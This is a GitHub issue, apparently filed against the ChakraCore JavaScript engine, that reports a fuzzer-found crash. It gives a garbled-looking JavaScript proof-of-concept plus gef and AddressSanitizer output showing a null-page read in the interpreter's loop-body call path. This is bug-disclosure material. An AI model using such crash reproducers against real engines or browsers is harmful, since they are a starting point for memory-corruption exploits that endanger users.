Skip to content

READ memory access #6645

New issue
New issue
Open
Open
READ memory access#6645
@bird8693

Description

@bird8693
bird8693
opened on Mar 17, 2021

ubuntu

ubuntu 16

poc

function main() {
    let arr = new Array(100);
    arr[0] = 1.1;
    this.__defineSetter__(1.1);
    for (let i = 0; ijjkkk < 100000; i++)
        opt(arr, 0, 0.014717213834064102);
    Ttyn[0] = 2.3023e-320;
    opt(3.141592653589793, 1.7976931348623157e+308, 3.141592653589793);
    main();
}
var tWtH = new String();
this.x = 4660;
var hExw = 2147483649 ** -2147483649;
for (let i = 0; i < 749; i++) {
    this[i + i + i + ('new Number(1)' + ('new Number(1)' + i))] = 1;
    var aaMw = Function.prototype.toString('new Number(1)' + i);
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        var KdrP = -4294967297 + -4294967295;
    }
    print();
    var QtYj = escape('v0');
    let arr = new Array(100);
}
main('valueOf', () => {
});
this.__defineSetter__('valueOf', () => {
});
var aaMw = main(tWtH);
main(0.1, -4294967295);
var AziF = Proxy;
this.__defineSetter__('\'0\'', () => {
});
opt('valueOf', () => {
});
for (let i = 0; i < b2[72]; this['new Number(1)' + i]++) {
    this.__defineSetter__('valueOf', () => {
    });
    this['new Number(1)'] = 1;
}

gef output

   0x7ffff7e225bd                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e225c2                  mov    QWORD PTR [rsp+0x8], rsi
   0x7ffff7e225c7                  mov    QWORD PTR [rsp], rdi
 → 0x7ffff7e225cb                  rex.W  call rax
   0x7ffff7e225ce                  mov    rax, QWORD PTR [rbx+0x8]
   0x7ffff7e225d2                  xor    ecx, ecx
   0x7ffff7e225d4                  mov    rdx, QWORD PTR [rbp-0x28]
   0x7ffff7e225d8                  cmp    rax, QWORD PTR [rdx]
   0x7ffff7e225db                  jne    0x7ffff7e22e5e
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e225cb in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e225cb → rex.W call rax
[#1] 0x7fffffffd1d0 → add al, dh

asan output

ASAN:DEADLYSIGNAL
=================================================================
==52626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f8d5ea4330b bp 0x7ffd17f7e440 sp 0x7ffd17f7e330 T0)
==52626==The signal is caused by a READ memory access.
==52626==Hint: address points to the zero page.
    #0 0x7f8d5ea4330a  (<unknown module>)
    #1 0x561a58015642 in Js::InterpreterStackFrame::CallLoopBody(void* (*)(Js::RecyclableObject*, Js::CallInfo, ...)) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6313:13
    #2 0x561a58015642 in Js::InterpreterStackFrame::DoLoopBodyStart(unsigned int, Js::LayoutSize, bool, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6117
    #3 0x561a5801a309 in void Js::InterpreterStackFrame::ProfiledLoopBodyStart<false, true>(unsigned int, Js::LayoutSize, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5885:41
    #4 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned int) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5857:9
    #5 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned char const*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5729
    #6 0x561a57e36075 in Js::InterpreterStackFrame::ProcessProfiled() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:51
    #7 0x561a57d9c679 in Js::InterpreterStackFrame::Process() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3427:20
    #8 0x561a57d9a890 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2107:40
    #9 0x561a57d99c08 in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1786:16
    #10 0x7f8d5eaa0fa1  (<unknown module>)
    #11 0x561a586daa0d in amd64_CallFunction /root/AFL/compile/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
    #12 0x561a582fec10 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:772:24
    #13 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:717:15
    #14 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:832
    #15 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83::operator()(Js::ScriptContext*, TTD::TTDJsRTActionResultAutoRecorder&) const /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3705:49
    #16 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:237
    #17 0x561a57796caa in _JsErrorCode ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:192
    #18 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:235
    #19 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3656
    #20 0x561a577a049a in CompileRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**, bool) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5019:12
    #21 0x561a577a049a in JsRun /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5041
    #22 0x561a57689419 in ChakraRTInterface::JsRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**) /root/AFL/compile/ChakraCore/bin/ch/ChakraRtInterface.h:483:179
    #23 0x561a57689419 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:491
    #24 0x561a5768bc44 in ExecuteTest(char const*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:963:13
    #25 0x561a5768c9a7 in ExecuteTestWithMemoryCheck(char*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1013:10
    #26 0x561a5768c9a7 in main /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1320
    #27 0x7f8d62fc682f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #28 0x561a57591298 in _start (/root/AFL/tt/chnew/ch2+0x2d7298)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (<unknown module>) 
==52626==ABORTING

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions